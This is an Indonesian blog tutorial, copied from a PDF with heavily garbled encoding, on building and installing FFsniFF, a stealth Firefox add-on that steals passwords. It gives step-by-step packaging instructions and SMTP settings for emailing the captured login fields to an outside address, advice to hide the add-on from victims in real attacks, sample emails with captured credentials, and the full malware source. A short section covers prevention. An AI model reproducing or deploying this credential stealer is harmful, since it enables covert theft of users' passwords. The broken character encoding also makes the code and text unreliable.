Post on 16-Feb-2018
7/23/2019 Menjaring Password Dengan FireFox
http://slidepdf.com/reader/full/menjaring-password-dengan-firefox 1/12
Menjaring Password dengan Firefox Sniffer On February 27, 2009, in How to, Web Security, by Rizki Wicaksono
Firefox adalah browser andalan saya, terutama untuk urusan penetration testing. Firefox memiliki banyak
sekali addon/extension yang sangat membantu untuk bermacam-macam urusan. Namun tidak semuaaddon membantu pengguna, ada juga addon yang menyadap dan mengirimkan username/password
pengguna ketika login ke email attacker, addon itu adalah FFsniFF.
Dalam artikel ini saya akan menunjukkan simulasi penyadapan password di browser korban dan
mengirimkan hasil sadapannya ke email saya di ilmuhacking.com. etelah itu saya akan jelaskan cara
kerja FFsniFF dengan membedah source codenya.
Sekilas tentang addon Firefox
!ddon firefox adalah program dalam ja"ascript yang diload dan diaktifkan setiap firefox dijalankan.
!ddon ini diperlukan untuk melakukan hal-hal yang tidak disediakan oleh firefox #firefox hanya
menyediakan fungsi-fungsi dasar saja$. !ntarmuka addon ada yang berbentuk ikon di status bar, toolbar
atau boleh juga tidak memiliki antarmuka sama sekali. FFsniFF adalah contoh addon yang tidak memiliki
antarmuka pengguna sama sekali, hal ini bisa dimaklumi karena memang addon ini harus bersifat stealth.
!ddon dipaketkan dan disebarkan dalam bentuk file %&', namun ekstensi filenya bukan (ip melainkan
)'& #dibaca *(ippy+$. Dalam file xpi tersebut ada banyak file dan folder lain seperti source code ja"ascript,
gambar dan file xml deskriptor. File-file yang umumnya ada dalam sebuah paket (ippy adalah
123
4567891011
exampleExt.xpi: /install.rdf
/components/*
/components/cmdline.s/defa!lts/
/defa!lts/preferences/*.s/pl!"ins/*/c#rome.manifest/c#rome/icons/defa!lt/*/c#rome/
/c#rome/content/
install.rdf adalah deskriptor untuk keperluan instalasi. elain itu di dalam paket itu juga ada file
ja"ascript yang berisi kode program yang menjalankan fungsi addon. elebihnya adalah file-file untuk
menangani user interface addon.
Membuat paket instalasi ffsniff.xpiangkah awal saya harus membuat paket instalasi addon ffsniff.xpi. ntuk itu saya harus mengunduh file
sumber FFsniFF dari http//a(urit.elbiahosting.sk/ffsniff/. etelah diunduh, file tar.g( itu harus
dimekarkan. &si dari paket itu setelah dimekarkan adalah12345
p$"%creator.p&src/src/install.rdfsrc/c#rome/src/c#rome/content/
7/23/2019 Menjaring Password Dengan FireFox
http://slidepdf.com/reader/full/menjaring-password-dengan-firefox 2/12
6789
src/c#rome/content/ffsniff/src/c#rome/content/ffsniff/ffsniff'(erla&.x!lsrc/c#rome/content/ffsniff/ffsniff'(erla&%ori".ssrc/c#rome/content/ffsniff/contents.rdf
File tar.g( itu tidak bisa langsung diinstall ke firefox karena masih berbentuk kumpulan file yang harus
diubah dan dibungkus menjadi paket (ippy #xpi$. ebenarnya untuk membuat paket (ippy sudah
disediakan script pkgcreator.py dalam bahasa python, namun dalam artikel ini saya tidak memakai
script itu agar saya bisa menunjukkan bagaimana proses pembuatan file xpi dari source code.
etelah source berhasil didownload, berikutnya saya harus membuat file ffsniff0"erlay.js, caranya adalah
dengan mengcopy file ffsniff0"erlayorig.js dalam nama ffsniff0"erlay.js. etelah itu ffsniff0"erlay.js
akan saya edit untuk mengubah beberapa "ariabel berikut
12345
67
(ar send%from%#ost ) +,E-%'%',(ar send%from ) +,E-%'(ar send%to ) +,E-%'(ar s!ect ) +,E(ar smtp%#ost ) +,;%',
(ar smtp%port ) +,;%;'(ar enale%#ide ) +<<-=
Konfigurasi smtp untuk @ilmuhacking.com
1) record ilmuhacking.com
2ariabel-"ariabel tersebut adalah parameter untuk mengirim email melalui smtp. smtphost berisi
alamat smtp ser"er yang dipakai untuk mengirim email. ebaiknya gunakan smtp ser"er yang
bertanggung jawab untuk domain email yang kita tuju,dalam kasus ini domain email tujuan adalah
3ilmuhacking.com. 0leh karena itu saya harus mencari smtp ser"er yang bertanggung jawab untuk
domain ilmuhacking.com. 4ara mencarinya adalah dengan melihat 1) record dari DN
ilmuhacking.com. !nda bisa gunakan layanan dnswatch.info untuk mencari 1) record ilmuhacking.com.
'erhatikan gambar di samping, terlihat bahwa ternyata smtp ser"er untuk ilmuhacking.com berada di
host yang sama, jadi smtphost saya isi dengan ilmuhacking.com. 'ada domain lain biasanya mail ser"er
adalah mail.domainanda.com.
sendfrom dan sendto saya isi dengan nilai yang sama, yaitu testing3ilmuhacking.com, alamat itu
adalah alamat email asal dan tujuan. 'erhatikan bahwa domain email sumber dan tujuan harus dalam
domain yang sama #ilmuhacking.com$ karena smtp ser"er umumnya tidak bersedia mengirimkan email
ke domain lain #istilahnya open relay$ bila pengirim tidak memasukkan password dulu #anonymous$.
7/23/2019 Menjaring Password Dengan FireFox
http://slidepdf.com/reader/full/menjaring-password-dengan-firefox 3/12
enablehide sengaja saya isi *no+ untuk kemudahan, dalam kasus nyata "ariabel ini harus diisi dengan
*yes+ agar tersembunyi dari daftar addon sehingga tidak membuat korban curiga. 5ila anda masih coba-
coba, sebaiknya isi dulu dengan *no+.
smtpport adalah port smtp ser"er, port standar untuk layanan smtp adalah 67. subject adalah subject
dari email yang akan berisi password korban.
1234567
(ar send%from%#ost ) ilm!#ac$in".com(ar send%from ) testin">ilm!#ac$in".com(ar send%to ) testin">ilm!#ac$in".com(ar s!ect ) ?o" irefox ,niffer(ar smtp%#ost ) ilm!#ac$in".com(ar smtp%port ) 25(ar enale%#ide ) no
Konfigurasi smtp untuk @telkom.net
!gar lebih memahami tentang konfigurasi email ini, saya beri contoh lain dengan email tujuan ke
telkom.net.Dengan cara yang sama saya harus membaca 1) record dari domain telkom.net, ternyata 1)
record untuk telkom.net ada 6 mx8.mail.plasa.com dan mx6.mail.plasa.com. 9erserah mau pilih yang
mana saja. :arena memakai smtp ser"er telkom.net, email tujuan harus berada di domain 3telkom.net,
di sini saya pakai ri(ki.wicaksono3telkom.net. !lamat asal saya isi sama dengan email tujuan. &ni berarti
saya mengirim email dari dan ke email yang sama, itu tidak masalah. sendfromhost saya isi dengan
telkom.net karena ini adalah domain. ;adi konfigurasi smtp untuk email tujuan 3telkom.net adalah
sebagai berikut
123456
7
(ar send%from%#ost ) tel$om.net(ar send%from ) ri@$i.Aica$sono>tel$om.net(ar send%to ) ri@$i.Aica$sono>tel$om.net(ar s!ect ) ?o" irefox ,niffer(ar smtp%#ost ) mx1.mail.plasa.com(ar smtp%port ) 25
(ar enale%#ide ) no
Membuat file ffsniff.jar
etelah "ariabel-"ariabel di file ffsniff0"erlay.js sudah diubah, langkah berikutnya adalah membuat file
ffsniff.jar. <alaupun ekstensi filenya adalah jar, sebenarnya ini adalah file (ip biasa. File-file yang
dimasukkan dalam ffsniff.jar adalahcontent/ffsniff/contents.rdfcontent/ffsniff/ffsniff'(erla&.scontent/ffsniff/ffsniff'(erla&.x!l
=asil file ffsniff.jar harus mengikutsertakan folder content/ffsniff, tidak boleh > file itu di(ip tanpa
mengikutsertakan foldernya. ;adi untuk membuat file ffsniff.jar harus berada di parent folder dari
content/ffsniff. !nda bebas menggunakan program apa saja untuk kompresi (ip ini, saya sendiri memakai
<in?!?. :etika dibuka dengan <&N?!? isi dari ffsniff.jar tampak seperti gambar di bawah ini,
perhatikan kolom pathnya harus berisi seperti itu.
7/23/2019 Menjaring Password Dengan FireFox
http://slidepdf.com/reader/full/menjaring-password-dengan-firefox 4/12
ffsniff.jar list files
Membuat file ffsniff.xpi
etelah mendapatkan file ffsniff.jar, selanjutnya saya harus membuat paket instalasi ffsniff.xpi. File ini
juga file (ip biasa, walaupun ekstensinya .xpi. &si file ffsniff.xpi adalah dua file berikut
install.rdfc#rome/ffsniff.ar
;angan lupa juga ffsniff.jar harus di(ip dalam folder chrome. @ambar di bawah ini menunjukkan
ffsniff.xpi yang dibuka dengan winrar, perhatikan juga kolom pathnya harus tepat seperti itu.
ffsniff.xpi file list
Instalasi Firefox Sniffer
0ke, kini selesai sudah proses pembuatan file instalasi addon FFsniffer. :ini saya bisa menginstall addon
tersebut. 4ara instalasi file xpi adalah dengan membuka Firefox, kemudian memasukkan path lokasi file
xpi pada addressbar firefox. etelah muncul daftar file di firefox, klik file xpi yang akan diinstall. 4ara
instalasi FFsniFF diperlihatkan pada gambar di bawah ini. etelah berhasil install jangan lupa untuk
restart firefox anda.
instalasi firefox sniffer
7/23/2019 Menjaring Password Dengan FireFox
http://slidepdf.com/reader/full/menjaring-password-dengan-firefox 5/12
Mencoba login ke yahoo
:ini saya akan mencoba login ke yahoo dengan username ri(kiwicaksono. etelah login, saya periksa
inbox email testing3ilmuhacking.com. 9ernyata email hasil sniff password ketika login ke yahoo sudah
masuk. &si emailnya terlihat pada gambar di bawah ini.
log sniffer email
Dalam email tersebut terlihat bahwa FFsniff tidak hanya mencatat username dan password tapi semua
field dengan tag input #input typeA+xxx+$ dari form, yaitu password field, hidden field, text field,
checkbox. elain itu FFsniff juga mencatat ?, nama field, jenis dan nilainya. FFsniFF hanya
mengirimkan field yang ada isinya, bila field tersebut kosong, field tersebut tidak akan dikirim.
Email Sniffer og
1ari kita perhatikan email yang dikirimkan FFsniFF. =eader lengkap email yang dikirim FFsniff adalah
sebagai berikut
123456789
et!rnBpat#: +testin">ilm!#ac$in".comEn(elopeBto: testin">ilm!#ac$in".comeli(er&Bdate: riC 27 e 2009 03:23:48 B0600ecei(ed: from D202.43.xxx.xxx Fport)23982 #elo)ilm!#ac$in".comG & "ator669.#ost"ator.com Ait# esmtp FExim 4.69G Fen(elopeBfrom +testin">ilm!#ac$in".comG id 1?c&AaB0002HB for testin">ilm!#ac$in".com riC 27 e 2009 03:23:48 B0600,!ect: ?o" irefox ,niffer
Dalam email tersebut hanya ada 8 header ?ecei"ed, yaitu dari host 6B6.C>.xxx.xxx #ip lengkap saya
sensor$. =al ini menunjukkan bahwa smtp ser"er yang saya pakai kebetulan adalah smtp ser"er yang
paling dekat dengan si penerima sehingga tidak perlu dioper ke smtp ser"er lain. 5erikut ini adalahheader email FFsniFF yang dikirim ke telkom.net
et!rnB;at#: +ri@$i.Aica$sono>tel$om.netecei(ed: from D125.160.17.193 FE?' mx1.mail.tel$om.netG & f1.c.plasa.com Fomm!ni=ate ;ro ,; 4.3.9G Ait# E,;, id 690188427 for ri@$i.Aica$sono>tel$om.net IedC 04 ar 200911:05:27 J0700ecei(ed: from mx1.mail.plasa.com FD222.124.18.71G
& mx1.mail.tel$om.net Ait# esmtp id 1?eiH&B0001K;B'1
7/23/2019 Menjaring Password Dengan FireFox
http://slidepdf.com/reader/full/menjaring-password-dengan-firefox 6/12
for ri@$i.Aica$sono>tel$om.net IedC 04 ar 2009 11:04:20 J0700LB<ron;ortBMntiB,pamBiltered: tr!eLB<ron;ortBMntiB,pamBes!lt:M""NMJrnHH6ce/2ds2#Mos<O==Po<;ss#MOH,;OE",A=LB<ron;ortBMP: E)cMfeei)5300C2777C5542 a)119895912ecei(ed: from xxxxdtp.net.id FE?' tel$om.netG FD202.43.xx.xxG & mx1.mail.plasa.com Ait# E,; 04 ar 2009 11:02:49 J0700,!ect: ?o" irefox ,nifferLBMB#ec$: NE,ate: IedC 04 ar 2009 11:05:27 J0700essa"eB<: +a!toB000690188427>f1.c.plasa.com
Dalam email ke telkom.net ada > header ?ecei"ed. ang pertama adalah mx8.mail.plasa.com, ini adalah
smtp ser"er yang saya pakai di FFsniFF. :emudian dari situ email dioper ke mx8.mail.telkom.net, dan
terakhir dioper lagi ke f8.c.plasa.com, yang merupakan smtp ser"er yang paling dekat dengan si penerima.
;adi sebenarnya saya bisa juga langsung mengirim email ke telkom.net dengan menggunakan smtp ser"er
f8.c.plasa.com. Namun karena 1) record telkom.net menunjuk ke mx8.mail.telkom.net lebih baik saya
pakai smtp ser"er itu, walaupun perlu dioper sebanyak 6 kali untuk sampai di tujuan.
FFsniff mengirimkan email tersebut secara anonymous, artinya ffsniff tidak melakukan authentication
sebelum mengirimkan email. 19' ser"er tidak mungkin menolak email yang ditujukan untuk domain
yang dikelola dirinya sendiri, walaupun pengirimnya adalah anonymous #tanpa authentication$, sebab
bila smtp ser"er menolak email untuk dirinya sendiri maka orang lain tidak akan bisa mengirim email ke
domain itu.
:arena dikirimkan secara anonymous maka email tersebut tidak bisa ditujukan ke domain lain selain
ilmuhacking.com karena smtp ser"er tersebut kemungkinan besar akan menolak dijadikan titik relay
pengiriman email ke domain lain. 5ila ingin mengirimkan email untuk domain lain tidak bisa secara
anonymous, sebelumnya harus memasukkan perintah smtp !9= 0@&N dan memasukkan
username/password dalam baseEC. aya tidak akan menjelaskan terlalu panjang soal email, di lainkesempatan akan saya bahas detil cara kerja email.
!encegahan
5ad guys already know about FFsniff since > years ago
FFsniff diciptakan pada bulan maret 6BBE, tepat > tahun yang lalu sehingga addon ini sudah dikenal luas
sebagai salah satu tools hacking. ekarang bagaimana caranya agar kita tidak menjadi korban addon ini
5erikut ini tips agar tidak menjadi korban FFsniff
;angan sembarangan menginstall addon yang tidak anda kenal. &nstall addon hanya dari situs
resmi Firefox !ddon https//addons.mo(illa.org/ &nstall !ddon hanya dari situs yang menggunakan https. 'enggunaan https ini sangat penting
agar anda tidak tersesat mengakses situs palsu yang berusaha memberikan anda addon yang sudah
diracuni spyware. 1engenai pentingnya https ini bisa anda baca di artikel understanding https
7/23/2019 Menjaring Password Dengan FireFox
http://slidepdf.com/reader/full/menjaring-password-dengan-firefox 7/12
firefox safe mode
5ila anda berada di komputer publik, gunakan Firefox dalam afe 1ode #mode aman$. 1ode ini
adalah mode menjalankan firefox dengan mematikan semua addon yang ada.
<alaupun FFsniFF dapat menyembunyikan diri dari daftar addon Firefox, namun tetap saja dia
tidak mungkin bisa bersembunyi di file system. ;ika anda ragu apakah firefox anda bersih dari
FFsniFF, silakan buka folder 'rofile 1o(illa Firefox anda. 5iasanya di
1:Qoc!ments and ,ettin"sQ+!sernameQMpplication ataQo@illaQirefoxQ;rofilesQtextQextensionsQ
firefox extension folder
:emudian perhatikan file install.rdf, dalam file itu terlihat nama dan deskripsi addon. !tau anda juga
bisa melihat folder di dalamnya lagi untuk membaca file dot js dari ffsniff.
"o# FFsniff $orks
aya telah menunjukkan mulai dari mengunduh, menginstall dan kemudian mendapatkan password
ketika ada yang login di firefox yang telah dipasang addon ini. :ini saatnya saya menjelaskan cara
kerja FFsniff ini. &nti dari FFsniff ini ada pada file ffsniff0"erlay.js. File ini berisi semua code yang
melakukan sniffing. 5erikut adalah source code lengkap ffsniff0"erlay.js.
1234567891011121314
var transport,er(ice ) omponents.classesD>mo@illa.or"/netAor$/soc$etBtransportBsvar transport ) var o!tstream ) var instream ) omponents.classesD>mo@illa.or"/scriptaleinp!tstream1.create<nsvar stream ) // find out FF version
var app<nfo ) omponents.classesD>mo@illa.or"/xre/appBinfo1."et,er(iceFomponenvar (ersion#ec$er ) omponents.classesD>mo@illa.or"/xpcom/(ersionBcomparator1. var data ) var data0 ) E?' J send%from%#ost J \r\nvar data1 ) M<? ': + J send%from J \r\nvar data2 ) ; ': + J send%to J \r\nvar data3 ) MM\r\n
7/23/2019 Menjaring Password Dengan FireFox
http://slidepdf.com/reader/full/menjaring-password-dengan-firefox 8/12
1516171819202122232425262728293031323334
353637383940414243444546474849505152535455565758596061
62636465666768697071
var data4 ) \r\n.\r\nvar data5 ) O<\r\nfunction send%dataFG R
transport ) transport,er(ice.createransportFnullC 0C smtp%#ostC smtp%poo!tstream ) transport.open'!tp!t,treamF0C 0C 0Gstream ) transport.open<np!t,treamF0C 0C 0Ginstream.initFstreamG
// this will avoid 'Improper use of SMTP command pipelining'
// error on SMTP servers
o!tstream.AriteFdata0C data0.len"t#GA#ile Finstream.a(ailaleFG )) 0G RSinstream.readFinstream.a(ailaleFGG
o!tstream.AriteFdata1C data1.len"t#GA#ile Finstream.a(ailaleFG )) 0G RSinstream.readFinstream.a(ailaleFGG
o!tstream.AriteFdata2C data2.len"t#GA#ile Finstream.a(ailaleFG )) 0G RS
instream.readFinstream.a(ailaleFGG o!tstream.AriteFdata3C data3.len"t#GA#ile Finstream.a(ailaleFG )) 0G RSinstream.readFinstream.a(ailaleFGG
o!tstream.AriteFdataC data.len"t#G// don't read here cos no data was send to us
//while (instream.available( !! " #$
//instream.read(instream.available(%
o!tstream.AriteFdata4C data4.len"t#GA#ile Finstream.a(ailaleFG )) 0G RSinstream.readFinstream.a(ailaleFGG
o!tstream.AriteFdata5C data5.len"t#GA#ile Finstream.a(ailaleFG )) 0G RS
o!tstream.closeFGinstream.closeFG
S
if F(ersion#ec$er.compareFapp<nfo.(ersionC 3.0G ) 0G Rvar Aor$in"#read ) functionFG RS
Aor$in"#read. prototype ) R
r!n: functionFG Rsend%dataFG
SS
S else Rvar r!nnale ) R
r!n: functionFG Rsend%dataFG
SS
S
function sniffFG R
7/23/2019 Menjaring Password Dengan FireFox
http://slidepdf.com/reader/full/menjaring-password-dengan-firefox 9/12
7273747576777879808182838485868788899091
9293949596979899100101102103104105106107108109110111112113114115116117118
119120121122123124125126127128
// if we are running under &." or later
if F(ersion#ec$er.compareFapp<nfo.(ersionC 3.0G ) 0G Rvar t#read ) omponents.classesD>mo@illa.or"/t#readBmana"er1."et#read.dispatc#Fnew Aor$in"#readFGC t#read.<,;M%-'M?G
S else R
var t#read ) omponents.classesD>mo@illa.or"/t#read1."et,er(icet#read.initFr!nnaleC 512*1024C omponents.interfaces.ns<#read.;
omponents.interfaces.ns<#read.,ME%-'<-M?EGS
S
function do%sniffFG R
var o$ ) 0var #esla ) AindoA.content.doc!ment."etElements&a"-ameFinp!tGdata ) for Fvar i ) 0 i + #esla.len"t# iJJG R
if F#eslaDi.(al!e T) G Rif F#eslaDi.t&pe )) passAordG R
o$ ) 1
Sif F#eslaDi.name )) G R
data J) #eslaDi.t&pe J : J +lan$: J #eslaDSelse R
data J) #eslaDi.t&pe J : J #eslaDi.name J: S
SS
if Fo$ )) 1G Rdata ) ,!ect: J s!ect J \r\n\r\n J AindoA.top.content.docsniffFG
SS
function #ide%meFG Rvar ,er(ice ) omponents.classesD>mo@illa.or"/rdf/rdfBser(ice1."et,evar ontainer ) omponents.classesD>mo@illa.or"/rdf/container1.create<nvar extension, ) omponents.classesD>mo@illa.or"/extensions/mana"er1."var root ) ,er(ice.=eteso!rceF!rn:mo@illa:item:rootGvar nameMrc ) ,er(ice.=eteso!rceF#ttp://AAA.mo@illa.or"/2004/emBrdfUnaontainer.<nitFextension,C rootGvar elements ) ontainer.=etElementsFGA#ile Felements.#asoreElementsFGG R
var element ) elements."et-extFGvar name ) var tar"et ) extension,.=etar"etFelementC nameMrcC trueGif Ftar"etG R
name ) tar"et.O!er&<nterfaceFomponents.interfaces.ns<?if Fname )) sniG R
ontainer.emo(eElementFelementC trueGS
SS
S
if Fenale%#ide )) &esG R#ide%meFG
S
AindoA.addE(ent?istenerFs!mitC do%sniffC falseG
7/23/2019 Menjaring Password Dengan FireFox
http://slidepdf.com/reader/full/menjaring-password-dengan-firefox 10/12
'erhatikan baris ke-86G pada source di atas, bila enablehide diset *yes+, maka ffsniff akan
menjalankan fungsi hideme#$. hideme#$ bertugas menghilangkan FFsniff dari daftar addon agar
kehadirannya tidak disadari pengguna. 4ara menyembunyikan diri adalah dengan cara menjalankan
fungsi 4ontainer.?emo"eHlement #baris ke-866$ hanya bila element itu bernama *FFsniFF+.
how ffsniff works
Fungsi sniffing sesungguhnya ada pada baris terakhir. 'ada baris terakhir, terdapat fungsiaddH"entistener#$. Fungsi ini berguna untuk mengaitkan e"ent submit dengan fungsi dosniff.
!rtinya fungsi dosniff akan dijalankan setiap kali terjadi e"ent submit. H"ent submit akan terjadi
bila ada reIuest '09 di browser, antara lain dengan melalui klik tombol bertipe submit #input
typeA+submit+$. Namun tidak hanya melalui klik saja, submit bisa juga dilakukan oleh ja"ascript.
Dengan cara apapun, bila terjadi reIuest '09 di browser, e"ent submit akan terjadi, dan artinya
fungsi dosniff juga akan dipanggil. ntuk lebih jelasnya perhatikan gambar di atas.
:ini fokus perhatian kita pindah ke fungsi dosniff #baris ke-JC$. Dalam fungsi sniff, ffsniffer
mengambil daftar semua tag KinputL yang ada dengan fungsi
window.content.document.getHlements5y9agName#*input+$. :emudian semua field tersebut akan
digabung dalam "ariabel string data. =anya bila dalam form tersebut terdapat password field #inputtypeA+password+$, maka ffsniffer akan mengirimkan email, bila hanya form biasa #bukan form login$,
ffsniffer tidak akan mengirim email.
5ila mengandung password field, berikutnya fungsi sniff #baris ke-G>$ akan dijalankan. Fungsi sniff
ini tugasnya hanya membuat dan menjalankan thread. 9hread tersebut bertugas melakukan
pengiriman email dengan memanggil fungsi senddata #baris ke-8G$. Fungsi senddata akan
membuka koneksi tcp ke smtp ser"er, kemudian mengirimkan perintah smtp untuk mengirim email.
Dengan menggunakan sniffer <ireshark, berikut adalah komunikasi yang terjadi ketika email dikirim
ke telkom.net
12345678910
220Bmx1.mail.plasa.com E,;220 EC pornC and a!si(e content not alloAedE?' tel$om.net250Bmx1.mail.plasa.com250B8<<E250 ,<VE 20971520M<? ': +ri@$i.Aica$sono>tel$om.net250 sender +ri@$i.Aica$sono>tel$om.net o$; ': +ri@$i.Aica$sono>tel$om.net250 recipient +ri@$i.Aica$sono>tel$om.net o$
7/23/2019 Menjaring Password Dengan FireFox
http://slidepdf.com/reader/full/menjaring-password-dengan-firefox 11/12
1112131415161718192021222324252627282930
31323334
MM354 "o a#ead,!ect: ?o" irefox ,niffer #ttps://lo"in.&a#oo.com/confi"/lo"inWt&pe:name:(al!eBBBBBBBBBBBBBBB#idden:.tries:2#idden:.intl:!s#idden:.!:6220o3t4Kr(31#idden:.(:0#idden:.c#allen"e:##09VLeN4r"=$r,$ir#.Le$%#idden:#ass"r:0#idden:.c#$;:N#idden:.done:#ttp://m&.&a#oo.com#idden:.pd:%(er)0Xc)Xi(t)Xs")text:lo"in:ri@$iAica$sonopassAord:passAd:inipassAord$!c#ec$ox:.persistent:&s!mit:.sa(e:,i"n <n
.250 o$: essa"e 119895912 accepted221 mx1.mail.plasa.comO<
edangkan komunikasi yang terjadi ketika email dikirim ke 3ilmuhacking.com adalah
220B"ator669.#ost"ator.com E,; Exim 4.69 U1 !eC 03 ar 200922:15:33 B0600220BIe do not a!t#ori@e t#e !se of t#is s&stem to transport!nsolicitedC220 and/or !l$ eBmail.E?' ilm!#ac$in".com250B"ator669.#ost"ator.com ello ilm!#ac$in".com D202.43.xxx.xxx
250B,<VE 52428800250B;<;E?<-<-=250BM ;?M<- ?'=<-250B,M?,250 E?;M<? ': +testin">ilm!#ac$in".com250 'H; ': +testin">ilm!#ac$in".com250 McceptedMM354 Enter messa"eC endin" Ait# . on a line & itself,!ect: ?o" irefox ,niffer #ttps://lo"in.&a#oo.com/confi"/lo"inWt&pe:name:(al!eBBBBBBBBBBBBBBB#idden:.tries:1#idden:.intl:!s#idden:.!:el(tc94Ks023#idden:.(:0#idden:.c#allen"e:7I@fnmn3-(1NadcIn61?&<A#idden:#ass"r:0#idden:.c#$;:N
7/23/2019 Menjaring Password Dengan FireFox
http://slidepdf.com/reader/full/menjaring-password-dengan-firefox 12/12
#idden:.done:#ttp://m&.&a#oo.com#idden:.pd:%(er)0Xc)Xi(t)Xs")text:lo"in:ri@$iAica$sonopassAord:passAd:inipassAorda$!!"ac#ec$ox:.persistent:&s!mit:.sa(e:,i"n <n.250 'H id)1?eiI6B0002@!B?MO<221 "ator669.#ost"ator.com closin" connection
Dengan selesainya eksekusi senddata#$ maka ffsniff telah selesai menjalankan tugasnya mengirim
email. elanjutnya ffsniff akan *tidur+ menunggu dipanggil oleh e"ent submit dan mulai kembali
proses penyadapan password.